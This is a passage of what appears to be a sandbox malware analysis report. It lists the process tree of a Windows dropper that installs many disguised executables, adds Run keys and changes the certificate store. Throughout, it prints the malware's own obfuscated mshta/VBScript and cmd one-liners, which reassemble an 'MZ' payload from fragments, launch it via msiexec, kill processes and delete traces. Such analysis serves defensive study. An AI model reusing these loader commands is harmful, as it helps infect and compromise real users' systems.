C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e24⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Users\Admin\Pictures\Adobe Films\fB2o7Rk0HXlk55eGAPCDGiLL.exe"C:\Users\Admin\Pictures\Adobe Films\fB2o7Rk0HXlk55eGAPCDGiLL.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\3TZ7ECc8pVkrKbTQm7Nq0hjh.exe"C:\Users\Admin\Pictures\Adobe Films\3TZ7ECc8pVkrKbTQm7Nq0hjh.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\hqntIi1rmOQqFwNlTimQeizd.exe"C:\Users\Admin\Pictures\Adobe Films\hqntIi1rmOQqFwNlTimQeizd.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome4 8KB.exe"C:\Users\Admin\AppData\Local\Temp\Chrome4 8KB.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\2158259.exe"C:\ProgramData\2158259.exe"6⤵
- Executes dropped EXE
-
C:\ProgramData\3945407.exe"C:\ProgramData\3945407.exe"6⤵
- Executes dropped EXE
-
C:\ProgramData\1897952.exe"C:\ProgramData\1897952.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Soft1WW02.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe" & del C:\ProgramData\*.dll & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Soft1WW02.exe /f7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\gfwang-game.exe"C:\Users\Admin\AppData\Local\Temp\gfwang-game.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"7⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"11⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"8⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"5⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5104 -s 15686⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-4SLV0.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-4SLV0.tmp\setup.tmp" /SL5="$10300,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-5PAAA.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-5PAAA.tmp\setup.tmp" /SL5="$302EA,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT8⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart9⤵
-
C:\b8d617e404502bea73\Setup.exeC:\b8d617e404502bea73\\Setup.exe /q /norestart /x86 /x64 /web10⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss19⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\is-F974P.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-F974P.tmp\postback.exe" ss19⤵
-
C:\Users\Admin\AppData\Local\Temp\inst2.exe"C:\Users\Admin\AppData\Local\Temp\inst2.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 5326⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 8086⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 8206⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 9286⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 9606⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 12606⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 12886⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 13246⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 13726⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 14046⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup_2.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup_2.exe" /f7⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=16⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"7⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1a4,0x1e8,0x7ffdad56dec0,0x7ffdad56ded0,0x7ffdad56dee08⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,9407046147723228043,4549387081977147195,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3568_1646406499" --mojo-platform-channel-handle=1704 /prefetch:88⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1632,9407046147723228043,4549387081977147195,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3568_1646406499" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1640 /prefetch:28⤵
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"5⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3412 -s 20326⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\28.exe"C:\Users\Admin\AppData\Local\Temp\28.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\CSDnmE0MRN2E1rJm3cw_GPED.exe"C:\Users\Admin\Pictures\Adobe Films\CSDnmE0MRN2E1rJm3cw_GPED.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\eo7E5lAWYInZHANjd_HEkgte.exe"C:\Users\Admin\Pictures\Adobe Films\eo7E5lAWYInZHANjd_HEkgte.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe5⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\BYAxd95nJw6toINwD7Ot00hD.exe"C:\Users\Admin\Pictures\Adobe Films\BYAxd95nJw6toINwD7Ot00hD.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\qZk6wVIWmSwp59kb4TU9Kllp.exe"C:\Users\Admin\Pictures\Adobe Films\qZk6wVIWmSwp59kb4TU9Kllp.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\qZk6wVIWmSwp59kb4TU9Kllp.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\qZk6wVIWmSwp59kb4TU9Kllp.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\qZk6wVIWmSwp59kb4TU9Kllp.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\qZk6wVIWmSwp59kb4TU9Kllp.exe" ) do taskkill -im "%~NxK" -F5⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"9⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "qZk6wVIWmSwp59kb4TU9Kllp.exe" -F6⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\bCO0a0Yc73GjmZfS1Nw0wkqR.exe"C:\Users\Admin\Pictures\Adobe Films\bCO0a0Yc73GjmZfS1Nw0wkqR.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-GLAV8.tmp\bCO0a0Yc73GjmZfS1Nw0wkqR.tmp"C:\Users\Admin\AppData\Local\Temp\is-GLAV8.tmp\bCO0a0Yc73GjmZfS1Nw0wkqR.tmp" /SL5="$20220,506127,422400,C:\Users\Admin\Pictures\Adobe Films\bCO0a0Yc73GjmZfS1Nw0wkqR.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-6L4KV.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-6L4KV.tmp\DYbALA.exe" /S /UID=27105⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\7-Zip\FVENJIACEF\foldershare.exe"C:\Program Files\7-Zip\FVENJIACEF\foldershare.exe" /VERYSILENT6⤵
-
C:\Users\Admin\AppData\Local\Temp\c4-b9762-e05-2c5ac-6802f043c0061\Taerudasire.exe"C:\Users\Admin\AppData\Local\Temp\c4-b9762-e05-2c5ac-6802f043c0061\Taerudasire.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 21047⤵
-
C:\Users\Admin\AppData\Local\Temp\7c-bcf2d-d1c-e5498-11f0f7ff12f47\Podiwypeme.exe"C:\Users\Admin\AppData\Local\Temp\7c-bcf2d-d1c-e5498-11f0f7ff12f47\Podiwypeme.exe"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kb3f4g1y.i34\GcleanerEU.exe /eufive & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\kb3f4g1y.i34\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kb3f4g1y.i34\GcleanerEU.exe /eufive8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u3pbdrpi.t2s\installer.exe /qn CAMPAIGN="654" & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\u3pbdrpi.t2s\installer.exeC:\Users\Admin\AppData\Local\Temp\u3pbdrpi.t2s\installer.exe /qn CAMPAIGN="654"8⤵
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\u3pbdrpi.t2s\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\u3pbdrpi.t2s\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634168960 /qn CAMPAIGN=""654"" " CAMPAIGN="654"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wg2jerrn.rqp\any.exe & exit7⤵
-
C:\Users\Admin\AppData\Local\Temp\wg2jerrn.rqp\any.exeC:\Users\Admin\AppData\Local\Temp\wg2jerrn.rqp\any.exe8⤵
-
C:\Users\Admin\AppData\Local\Temp\wg2jerrn.rqp\any.exe"C:\Users\Admin\AppData\Local\Temp\wg2jerrn.rqp\any.exe" -u9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\niygutpt.quf\gcleaner.exe /mixfive & exit7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\niygutpt.quf\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\niygutpt.quf\gcleaner.exe /mixfive8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\23mg0k1j.llq\autosubplayer.exe /S & exit7⤵
-
C:\Users\Admin\Pictures\Adobe Films\FJL1dLO9z69oVfNIz4ApCxfp.exe"C:\Users\Admin\Pictures\Adobe Films\FJL1dLO9z69oVfNIz4ApCxfp.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=14⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"5⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f0,0x1f4,0x1f8,0x1cc,0x1fc,0x7ffdad56dec0,0x7ffdad56ded0,0x7ffdad56dee06⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff6f0e29e70,0x7ff6f0e29e80,0x7ff6f0e29e907⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1680,512364318062274172,3100385245752869949,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5928_1111685166" --mojo-platform-channel-handle=1740 /prefetch:86⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1680,512364318062274172,3100385245752869949,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5928_1111685166" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1692 /prefetch:26⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1680,512364318062274172,3100385245752869949,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5928_1111685166" --mojo-platform-channel-handle=2100 /prefetch:86⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1680,512364318062274172,3100385245752869949,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5928_1111685166" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2532 /prefetch:16⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1680,512364318062274172,3100385245752869949,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5928_1111685166" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2492 /prefetch:16⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1680,512364318062274172,3100385245752869949,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5928_1111685166" --mojo-platform-channel-handle=1684 /prefetch:86⤵
-
